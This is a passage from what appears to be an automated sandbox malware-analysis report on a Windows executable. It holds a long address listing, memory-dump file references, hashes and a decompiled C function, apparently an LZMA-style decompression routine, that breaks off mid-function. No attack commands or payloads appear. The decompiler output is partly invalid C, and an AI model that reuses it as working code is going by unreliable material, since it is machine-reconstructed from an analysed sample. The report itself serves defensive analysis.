                                                          0x0040708f
                                                          0x00407092
                                                          0x00407095
                                                          0x0040709f
                                                          0x0040706e
                                                          0x0040706e
                                                          0x00407071
                                                          0x00407074
                                                          0x00407077
                                                          0x00407084
                                                          0x00407087
                                                          0x00407087
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x00000000
                                                          0x004070ab
                                                          0x004070af
                                                          0x00000000
                                                          0x00000000
                                                          0x004070b5
                                                          0x004070b9
                                                          0x00000000
                                                          0x00000000
                                                          0x004070bf
                                                          0x004070c1
                                                          0x004070c5
                                                          0x004070c5
                                                          0x004070c8
                                                          0x004070cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407143
                                                          0x00407147
                                                          0x0040714e
                                                          0x00407151
                                                          0x00407154
                                                          0x00407149
                                                          0x00407149
                                                          0x00407149
                                                          0x00407157
                                                          0x0040715a
                                                          0x00000000
                                                          0x00000000
                                                          0x00407203
                                                          0x00407203
                                                          0x00407207
                                                          0x004075a5
                                                          0x00000000
                                                          0x004075a5
                                                          0x0040720d
                                                          0x00407210
                                                          0x00407213
                                                          0x00407217
                                                          0x0040721a
                                                          0x00407220
                                                          0x00407222
                                                          0x00407222
                                                          0x00407222
                                                          0x00407225
                                                          0x00407228
                                                          0x00000000
                                                          0x00000000
                                                          0x00406df8
                                                          0x00406df8
                                                          0x00406dfc
                                                          0x00407569
                                                          0x00000000
                                                          0x00407569
                                                          0x00406e02
                                                          0x00406e05
                                                          0x00406e08
                                                          0x00406e0c
                                                          0x00406e0f
                                                          0x00406e15
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e1a
                                                          0x00406e1d
                                                          0x00406e1d
                                                          0x00406e20
                                                          0x00406e23
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e29
                                                          0x00406e2f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e35
                                                          0x00406e35
                                                          0x00406e39
                                                          0x00406e3c
                                                          0x00406e3f
                                                          0x00406e42
                                                          0x00406e45
                                                          0x00406e46
                                                          0x00406e49
                                                          0x00406e4b
                                                          0x00406e51
                                                          0x00406e54
                                                          0x00406e57
                                                          0x00406e5a
                                                          0x00406e5d
                                                          0x00406e60
                                                          0x00406e63
                                                          0x00406e7f
                                                          0x00406e82
                                                          0x00406e85
                                                          0x00406e88
                                                          0x00406e8f
                                                          0x00406e93
                                                          0x00406e95
                                                          0x00406e99
                                                          0x00406e65
                                                          0x00406e65
                                                          0x00406e69
                                                          0x00406e71
                                                          0x00406e76
                                                          0x00406e78
                                                          0x00406e7a
                                                          0x00406e7a
                                                          0x00406e9c
                                                          0x00406ea3
                                                          0x00406ea6
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eb1
                                                          0x00406eb1
                                                          0x00406eb5
                                                          0x00407575
                                                          0x00000000
                                                          0x00407575
                                                          0x00406ebb
                                                          0x00406ebe
                                                          0x00406ec1
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ece
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed3
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406edc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ede
                                                          0x00406ee1
                                                          0x00406ee4
                                                          0x00406ee7
                                                          0x00406eea
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef3
                                                          0x00406ef6
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406f14
                                                          0x00406f17
                                                          0x00406f1a
                                                          0x00406f1d
                                                          0x00406f1d
                                                          0x00406f20
                                                          0x00406f24
                                                          0x00406f26
                                                          0x00406efe
                                                          0x00406efe
                                                          0x00406f06
                                                          0x00406f0b
                                                          0x00406f0d
                                                          0x00406f0f
                                                          0x00406f0f
                                                          0x00406f29
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00406f35
                                                          0x00000000
                                                          0x00406f35
                                                          0x00406f33
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f75
                                                          0x00406f75
                                                          0x00406f79
                                                          0x00407581
                                                          0x00000000
                                                          0x00407581
                                                          0x00406f7f
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00406f89
                                                          0x00406f8c
                                                          0x00406f92
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f97
                                                          0x00406f9a
                                                          0x00406f9a
                                                          0x00406fa0
                                                          0x00406f3e
                                                          0x00406f3e
                                                          0x00406f41
                                                          0x00000000
                                                          0x00406f41
                                                          0x00406fa2
                                                          0x00406fa2
                                                          0x00406fa5
                                                          0x00406fa8
                                                          0x00406fab
                                                          0x00406fae
                                                          0x00406fb1
                                                          0x00406fb4
                                                          0x00406fb7
                                                          0x00406fba
                                                          0x00406fbd
                                                          0x00406fc0
                                                          0x00406fd8
                                                          0x00406fdb
                                                          0x00406fde
                                                          0x00406fe1
                                                          0x00406fe1
                                                          0x00406fe4
                                                          0x00406fe8
                                                          0x00406fea
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fca
                                                          0x00406fcf
                                                          0x00406fd1
                                                          0x00406fd3
                                                          0x00406fd3
                                                          0x00406fed
                                                          0x00406ff4
                                                          0x00406ff7
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00407286
                                                          0x00407286
                                                          0x0040728a
                                                          0x004075b1
                                                          0x00000000
                                                          0x004075b1
                                                          0x00407290
                                                          0x00407293
                                                          0x00407296
                                                          0x0040729a
                                                          0x0040729d
                                                          0x004072a3
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407395
                                                          0x00407399
                                                          0x004073bb
                                                          0x004073be
                                                          0x004073c8
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x004073cb
                                                          0x0040739b
                                                          0x0040739e
                                                          0x004073a2
                                                          0x004073a5
                                                          0x004073a5
                                                          0x004073a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407452
                                                          0x00407456
                                                          0x00407474
                                                          0x00407474
                                                          0x00407474
                                                          0x0040747b
                                                          0x00407482
                                                          0x00407489
                                                          0x00407489
                                                          0x00000000
                                                          0x00407489
                                                          0x00407458
                                                          0x0040745b
                                                          0x0040745e
                                                          0x00407461
                                                          0x00407468
                                                          0x004073ac
                                                          0x004073ac
                                                          0x004073af
                                                          0x00000000
                                                          0x00000000
                                                          0x00407543
                                                          0x00407546
                                                          0x00407447
                                                          0x00000000
                                                          0x00000000
                                                          0x0040717d
                                                          0x0040717f
                                                          0x00407186
                                                          0x00407187
                                                          0x00407189
                                                          0x0040718c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407194
                                                          0x00407197
                                                          0x0040719a
                                                          0x0040719c
                                                          0x0040719e
                                                          0x0040719e
                                                          0x0040719f
                                                          0x004071a2
                                                          0x004071a9
                                                          0x004071ac
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x00407490
                                                          0x00407490
                                                          0x00407493
                                                          0x0040749a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040749f
                                                          0x0040749f
                                                          0x004074a3
                                                          0x004075db
                                                          0x00000000
                                                          0x004075db
                                                          0x004074a9
                                                          0x004074ac
                                                          0x004074af
                                                          0x004074b3
                                                          0x004074b6
                                                          0x004074bc
                                                          0x004074be
                                                          0x004074be
                                                          0x004074be
                                                          0x004074c1
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c7
                                                          0x004074c7
                                                          0x004074cb
                                                          0x0040752b
                                                          0x0040752e
                                                          0x00407533
                                                          0x00407534
                                                          0x00407536
                                                          0x00407538
                                                          0x0040753b
                                                          0x00407447
                                                          0x00407447
                                                          0x00000000
                                                          0x0040744d
                                                          0x00407447
                                                          0x004074cd
                                                          0x004074d3
                                                          0x004074d6
                                                          0x004074d9
                                                          0x004074dc
                                                          0x004074df
                                                          0x004074e2
                                                          0x004074e5
                                                          0x004074e8
                                                          0x004074eb
                                                          0x004074ee
                                                          0x00407507
                                                          0x0040750a
                                                          0x0040750d
                                                          0x00407510
                                                          0x00407514
                                                          0x00407516
                                                          0x00407516
                                                          0x00407517
                                                          0x0040751a
                                                          0x004074f0
                                                          0x004074f0
                                                          0x004074f8
                                                          0x004074fd
                                                          0x004074ff
                                                          0x00407502
                                                          0x00407502
                                                          0x0040751d
                                                          0x00407524
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x004071c2
                                                          0x004071c5
                                                          0x004071fb
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732e
                                                          0x0040732e
                                                          0x00407331
                                                          0x00407333
                                                          0x004075bd
                                                          0x00000000
                                                          0x004075bd
                                                          0x00407339
                                                          0x0040733c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407342
                                                          0x00407346
                                                          0x00407349
                                                          0x00407349
                                                          0x00407349
                                                          0x00000000
                                                          0x00407349
                                                          0x004071c7
                                                          0x004071c9
                                                          0x004071cb
                                                          0x004071cd
                                                          0x004071d0
                                                          0x004071d1
                                                          0x004071d3
                                                          0x004071d5
                                                          0x004071d8
                                                          0x004071db
                                                          0x004071f1
                                                          0x004071f6
                                                          0x0040722e
                                                          0x0040722e
                                                          0x00407232
                                                          0x0040725e
                                                          0x00407260
                                                          0x00407267
                                                          0x0040726a
                                                          0x0040726d
                                                          0x0040726d
                                                          0x00407272
                                                          0x00407272
                                                          0x00407274
                                                          0x00407277
                                                          0x0040727e
                                                          0x00407281
                                                          0x004072ae
                                                          0x004072ae
                                                          0x004072b1
                                                          0x004072b4
                                                          0x00407328
                                                          0x00407328
                                                          0x00407328
                                                          0x00000000
                                                          0x00407328
                                                          0x004072b6
                                                          0x004072bc
                                                          0x004072bf
                                                          0x004072c2
                                                          0x004072c5
                                                          0x004072c8
                                                          0x004072cb
                                                          0x004072ce
                                                          0x004072d1
                                                          0x004072d4
                                                          0x004072d7
                                                          0x004072f0
                                                          0x004072f2
                                                          0x004072f5
                                                          0x004072f6
                                                          0x004072f9
                                                          0x004072fb
                                                          0x004072fe
                                                          0x00407300
                                                          0x00407302
                                                          0x00407305
                                                          0x00407307
                                                          0x0040730a
                                                          0x0040730e
                                                          0x00407310
                                                          0x00407310
                                                          0x00407311
                                                          0x00407314
                                                          0x00407317
                                                          0x004072d9
                                                          0x004072d9
                                                          0x004072e1
                                                          0x004072e6
                                                          0x004072e8
                                                          0x004072eb
                                                          0x004072eb
                                                          0x0040731a
                                                          0x00407321
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x00000000
                                                          0x00407323
                                                          0x00000000
                                                          0x00407323
                                                          0x00407321
                                                          0x00407234
                                                          0x00407237
                                                          0x00407239
                                                          0x0040723c
                                                          0x0040723f
                                                          0x00407242
                                                          0x00407244
                                                          0x00407247
                                                          0x0040724a
                                                          0x0040724a
                                                          0x0040724d
                                                          0x0040724d
                                                          0x00407250
                                                          0x00407257
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x00000000
                                                          0x00407259
                                                          0x00000000
                                                          0x00407259
                                                          0x00407257
                                                          0x004071dd
                                                          0x004071e0
                                                          0x004071e2
                                                          0x004071e5
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f44
                                                          0x00406f44
                                                          0x00406f48
                                                          0x0040758d
                                                          0x00000000
                                                          0x0040758d
                                                          0x00406f4e
                                                          0x00406f51
                                                          0x00406f54
                                                          0x00406f57
                                                          0x00406f5a
                                                          0x00406f5d
                                                          0x00406f60
                                                          0x00406f62
                                                          0x00406f65
                                                          0x00406f68
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00000000
                                                          0x00000000
                                                          0x004070cf
                                                          0x004070cf
                                                          0x004070d3
                                                          0x00407599
                                                          0x00000000
                                                          0x00407599
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e7
                                                          0x004070ea
                                                          0x004070ed
                                                          0x004070f0
                                                          0x004070f3
                                                          0x004070f6
                                                          0x004070f7
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070fc
                                                          0x004070ff
                                                          0x00407102
                                                          0x00407105
                                                          0x00407105
                                                          0x00407105
                                                          0x00407108
                                                          0x0040710a
                                                          0x0040710a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040734c
                                                          0x0040734c
                                                          0x0040734c
                                                          0x00407350
                                                          0x00000000
                                                          0x00000000
                                                          0x00407356
                                                          0x00407359
                                                          0x0040735c
                                                          0x0040735f
                                                          0x00407361
                                                          0x00407361
                                                          0x00407361
                                                          0x00407364
                                                          0x00407367
                                                          0x0040736a
                                                          0x0040736d
                                                          0x00407370
                                                          0x00407373
                                                          0x00407374
                                                          0x00407376
                                                          0x00407376
                                                          0x00407376
                                                          0x00407379
                                                          0x0040737c
                                                          0x0040737f
                                                          0x00407382
                                                          0x00407385
                                                          0x00407389
                                                          0x0040738b
                                                          0x0040738e
                                                          0x00000000
                                                          0x00407390
                                                          0x0040710d
                                                          0x0040710d
                                                          0x00000000
                                                          0x0040710d
                                                          0x0040738e
                                                          0x004075c3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x004075fa
                                                          0x004075fa
                                                          0x00000000
                                                          0x004075fa
                                                          0x00407447
                                                          0x004073ce
                                                          0x004073cb
                                                          0x00000000
                                                          0x00407120

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                          • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                          • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                          • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E00407068() {
                                                          				unsigned short _t531;
                                                          				signed int _t532;
                                                          				void _t533;
                                                          				signed int _t534;
                                                          				signed int _t535;
                                                          				signed int _t565;
                                                          				signed int _t568;
                                                          				signed int _t589;
                                                          				signed int* _t606;
                                                          				void* _t613;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t613 - 0x40) != 0) {
                                                          						 *(_t613 - 0x84) = 0xa;
                                                          						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                          					} else {
                                                          						 *(__ebp - 0x84) = 9;
                                                          						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          					}
                                                          					while(1) {
                                                          						 *(_t613 - 0x54) = _t606;
                                                          						while(1) {
                                                          							L133:
                                                          							_t531 =  *_t606;
                                                          							_t589 = _t531 & 0x0000ffff;
                                                          							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                          							if( *(_t613 - 0xc) >= _t565) {
                                                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                          								 *(_t613 - 0x40) = 1;
                                                          								_t532 = _t531 - (_t531 >> 5);
                                                          								 *_t606 = _t532;
                                                          							} else {
                                                          								 *(_t613 - 0x10) = _t565;
                                                          								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                          							}
                                                          							if( *(_t613 - 0x10) >= 0x1000000) {
                                                          								goto L139;
                                                          							}
                                                          							L137:
                                                          							if( *(_t613 - 0x6c) == 0) {
                                                          								 *(_t613 - 0x88) = 5;
                                                          								L170:
                                                          								_t568 = 0x22;
                                                          								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                          								_t535 = 0;
                                                          								L172:
                                                          								return _t535;
                                                          							}
                                                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          							L139:
                                                          							_t533 =  *(_t613 - 0x84);
                                                          							while(1) {
                                                          								 *(_t613 - 0x88) = _t533;
                                                          								while(1) {
                                                          									L1:
                                                          									_t534 =  *(_t613 - 0x88);
                                                          									if(_t534 > 0x1c) {
                                                          										break;
                                                          									}
                                                          									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                          										case 0:
                                                          											if( *(_t613 - 0x6c) == 0) {
                                                          												goto L170;
                                                          											}
                                                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          											_t534 =  *( *(_t613 - 0x70));
                                                          											if(_t534 > 0xe1) {
                                                          												goto L171;
                                                          											}
                                                          											_t538 = _t534 & 0x000000ff;
                                                          											_push(0x2d);
                                                          											asm("cdq");
                                                          											_pop(_t570);
                                                          											_push(9);
                                                          											_pop(_t571);
                                                          											_t609 = _t538 / _t570;
                                                          											_t540 = _t538 % _t570 & 0x000000ff;
                                                          											asm("cdq");
                                                          											_t604 = _t540 % _t571 & 0x000000ff;
                                                          											 *(_t613 - 0x3c) = _t604;
                                                          											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                          											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                          											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                          											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                          												L10:
                                                          												if(_t612 == 0) {
                                                          													L12:
                                                          													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          													goto L15;
                                                          												} else {
                                                          													goto L11;
                                                          												}
                                                          												do {
                                                          													L11:
                                                          													_t612 = _t612 - 1;
                                                          													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                          												} while (_t612 != 0);
                                                          												goto L12;
                                                          											}
                                                          											if( *(_t613 - 4) != 0) {
                                                          												GlobalFree( *(_t613 - 4));
                                                          											}
                                                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                          											 *(_t613 - 4) = _t534;
                                                          											if(_t534 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                          												goto L10;
                                                          											}
                                                          										case 1:
                                                          											L13:
                                                          											__eflags =  *(_t613 - 0x6c);
                                                          											if( *(_t613 - 0x6c) == 0) {
                                                          												 *(_t613 - 0x88) = 1;
                                                          												goto L170;
                                                          											}
                                                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          											_t45 = _t613 - 0x48;
                                                          											 *_t45 =  *(_t613 - 0x48) + 1;
                                                          											__eflags =  *_t45;
                                                          											L15:
                                                          											if( *(_t613 - 0x48) < 4) {
                                                          												goto L13;
                                                          											}
                                                          											_t546 =  *(_t613 - 0x40);
                                                          											if(_t546 ==  *(_t613 - 0x74)) {
                                                          												L20:
                                                          												 *(_t613 - 0x48) = 5;
                                                          												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                          												goto L23;
                                                          											}
                                                          											 *(_t613 - 0x74) = _t546;
                                                          											if( *(_t613 - 8) != 0) {
                                                          												GlobalFree( *(_t613 - 8));
                                                          											}
                                                          											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                          											 *(_t613 - 8) = _t534;
                                                          											if(_t534 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												goto L20;
                                                          											}
                                                          										case 2:
                                                          											L24:
                                                          											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                          											 *(_t613 - 0x84) = 6;
                                                          											 *(_t613 - 0x4c) = _t553;
                                                          											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                          											 *(_t613 - 0x54) = _t606;
                                                          											goto L133;
                                                          										case 3:
                                                          											L21:
                                                          											__eflags =  *(_t613 - 0x6c);
                                                          											if( *(_t613 - 0x6c) == 0) {
                                                          												 *(_t613 - 0x88) = 3;
                                                          												goto L170;
                                                          											}
                                                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          											_t67 = _t613 - 0x70;
                                                          											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                          											__eflags =  *_t67;
                                                          											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          											L23:
                                                          											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                          											if( *(_t613 - 0x48) != 0) {
                                                          												goto L21;
                                                          											}
                                                          											goto L24;
                                                          										case 4:
                                                          											L133:
                                                          											_t531 =  *_t606;
                                                          											_t589 = _t531 & 0x0000ffff;
                                                          											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                          											if( *(_t613 - 0xc) >= _t565) {
                                                          												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                          												 *(_t613 - 0x40) = 1;
                                                          												_t532 = _t531 - (_t531 >> 5);
                                                          												 *_t606 = _t532;
                                                          											} else {
                                                          												 *(_t613 - 0x10) = _t565;
                                                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                          											}
                                                          											if( *(_t613 - 0x10) >= 0x1000000) {
                                                          												goto L139;
                                                          											}
                                                          										case 5:
                                                          											goto L137;
                                                          										case 6:
                                                          											__edx = 0;
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) = 1;
                                                          												 *(__ebp - 0x84) = 7;
                                                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          												while(1) {
                                                          													 *(_t613 - 0x54) = _t606;
                                                          													goto L133;
                                                          												}
                                                          											}
                                                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          											__esi =  *(__ebp - 0x60);
                                                          											__cl = 8;
                                                          											__cl = 8 -  *(__ebp - 0x3c);
                                                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          											__ecx =  *(__ebp - 0x3c);
                                                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          											__ecx =  *(__ebp - 4);
                                                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          											__eflags =  *(__ebp - 0x38) - 4;
                                                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											if( *(__ebp - 0x38) >= 4) {
                                                          												__eflags =  *(__ebp - 0x38) - 0xa;
                                                          												if( *(__ebp - 0x38) >= 0xa) {
                                                          													_t98 = __ebp - 0x38;
                                                          													 *_t98 =  *(__ebp - 0x38) - 6;
                                                          													__eflags =  *_t98;
                                                          												} else {
                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          												}
                                                          											} else {
                                                          												 *(__ebp - 0x38) = 0;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x34) - __edx;
                                                          											if( *(__ebp - 0x34) == __edx) {
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												goto L61;
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__ecx =  *(__ebp - 8);
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												__al =  *((intOrPtr*)(__eax + __ecx));
                                                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          												goto L41;
                                                          											}
                                                          										case 7:
                                                          											__eflags =  *(__ebp - 0x40) - 1;
                                                          											if( *(__ebp - 0x40) != 1) {
                                                          												__eax =  *(__ebp - 0x24);
                                                          												 *(__ebp - 0x80) = 0x16;
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x28);
                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          												__al = __al & 0x000000fd;
                                                          												__eax = (__eflags >= 0) - 1 + 0xa;
                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          												__eax =  *(__ebp - 4);
                                                          												__eax =  *(__ebp - 4) + 0x664;
                                                          												__eflags = __eax;
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												goto L69;
                                                          											}
                                                          											__eax =  *(__ebp - 4);
                                                          											__ecx =  *(__ebp - 0x38);
                                                          											 *(__ebp - 0x84) = 8;
                                                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          											while(1) {
                                                          												 *(_t613 - 0x54) = _t606;
                                                          												goto L133;
                                                          											}
                                                          										case 8:
                                                          											goto L0;
                                                          										case 9:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												goto L89;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x60);
                                                          											if( *(__ebp - 0x60) == 0) {
                                                          												goto L171;
                                                          											}
                                                          											__eax = 0;
                                                          											__eflags =  *(__ebp - 0x38) - 7;
